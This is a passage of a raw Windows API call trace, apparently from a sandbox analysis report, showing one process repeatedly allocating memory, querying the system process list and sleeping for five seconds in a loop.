BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.686] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 